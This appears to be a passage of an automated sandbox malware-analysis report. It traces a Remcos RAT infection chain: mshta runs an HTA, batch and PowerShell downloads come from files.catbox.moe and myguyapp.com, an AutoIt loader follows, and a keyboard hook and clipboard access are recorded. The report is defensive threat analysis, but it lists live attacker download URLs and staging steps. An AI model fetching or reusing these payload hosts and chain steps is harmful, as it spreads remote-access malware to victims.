    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49758 -> 178.237.33.50:80
    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49735 -> 193.26.115.39:443
    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49738 -> 193.26.115.39:443
    Source: global trafficHTTP traffic detected: GET /0o8vth.bat HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CED889 InternetReadFile,SetEvent,GetLastError,SetEvent,38_2_00CED889
    Source: global trafficHTTP traffic detected: GET /0o8vth.bat HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
    Source: global trafficDNS traffic detected: DNS query: myguyapp.com
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: global trafficDNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
    Source: global trafficDNS traffic detected: DNS query: me-work.com
    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: msword.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: msword.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: msword.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: msword.exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: msword.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: msword.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: msword.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: msword.exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: msword.exe.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: msword.exe, 0000000D.00000000.1841551557.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.11.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: msword.exe.11.drString found in binary or memory: http://ocsp.digicert.com0
    Source: msword.exe.11.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: msword.exe.11.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: msword.exe.11.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.1919152978.0000000000D25000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000000.1944526047.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2070151475.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, Clinton.26.dr, Propose.com.17.dr, LinkHub.com.30.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: msword.exe.11.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.drString found in binary or memory: http://x1.i.lencr.org/
    Source: mshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859438756.000000000A863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbl
    Source: mshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856565051.000000000A8A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox
    Source: mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
    Source: mshta.exe, 00000000.00000003.1843154558.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1848250807.0000000003214000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845396099.000000000320C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858635359.0000000003216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
    Source: mshta.exe, 00000000.00000002.1858472239.00000000031B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859827456.000000000A8C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845946616.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A8CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652474186.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652498264.000000000317E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652498264.0000000003162000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652345034.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856157178.000000000A8CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845455360.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845455360.000000000317F000.00000004.00000020.00020000.00000000.sdmp, c2.htaString found in binary or memory: https://files.catbox.moe/0o8vth.bat
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/0o8vth.bat1
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/0o8vth.batC
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/0o8vth.bat_
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/0o8vth.battH
    Source: mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/p
    Source: mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
    Source: mshta.exe, 00000000.00000002.1859438756.000000000A840000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903280293.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1905973754.0000000000890000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910330703.0000000000568000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910582302.00000000028D0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1970800280.0000000003108000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1971387427.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1928035896.0000000003490000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928267777.0000000003290000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928406070.0000000003600000.00000004.00000020.00020000.00000000.sdmp, 0o8vth[1].bat.0.dr, temp.bat.0.drString found in binary or memory: https://myguyapp.com/W2.pdf
    Source: tasklist.exe, 00000013.00000003.1896304387.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897560257.0000000000D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdf&vO
    Source: cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfD
    Source: mshta.exe, 00000000.00000002.1859755498.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856790839.000000000AD10000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000D.00000002.1870410967.00000000023C0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000D.00000002.1869277410.000000000087E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000D.00000002.1870666029.0000000002590000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897779847.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897227873.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1896304387.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897560257.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903280293.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1905973754.0000000000890000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910330703.0000000000568000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910582302.00000000028D0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1970800280.0000000003108000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1971387427.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1928035896.0000000003490000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928267777.0000000003290000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928406070.0000000003600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip
    Source: tasklist.exe, 00000013.00000002.1897227873.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip.
    Source: tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip7
    Source: cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipF
    Source: tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipK
    Source: msword.exe, 0000000D.00000002.1869277410.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipiZ
    Source: Propose.com, 0000001E.00000003.1925118973.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925065278.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926628658.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924979857.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924940162.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925001537.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926572699.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925043539.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924959596.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925023697.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926599427.0000000000E95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf
    Source: cmd.exe, 00000023.00000002.1928219562.00000000030E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: LinkHub.com.30.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49738 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Installs a global keyboard hook
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004050CD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,38_2_00CEF7C7
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,38_2_00CEF55C
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,13_2_004044A5
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00D09FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,38_2_00D09FD2

    E-Banking Fraud

    barindex
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

    System Summary

    barindex
    Powershell drops PE file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Wscript called in batch mode (surpress errors)
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,38_2_00CE4763
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,38_2_00CD1B4D
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,13_2_00403883
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,38_2_00CDF20D
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\EquationsHighlights
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\OurProperty
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\ItemAnytime
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\ExpenditureBlood
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DentalSubtle
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_0040497C13_2_0040497C
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00406ED213_2_00406ED2
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004074BB13_2_004074BB
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C9801738_2_00C98017
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C7E1F038_2_00C7E1F0
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C8E14438_2_00C8E144
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C722AD38_2_00C722AD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C922A238_2_00C922A2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CAA26E38_2_00CAA26E
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C8C62438_2_00C8C624
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CFC8A438_2_00CFC8A4
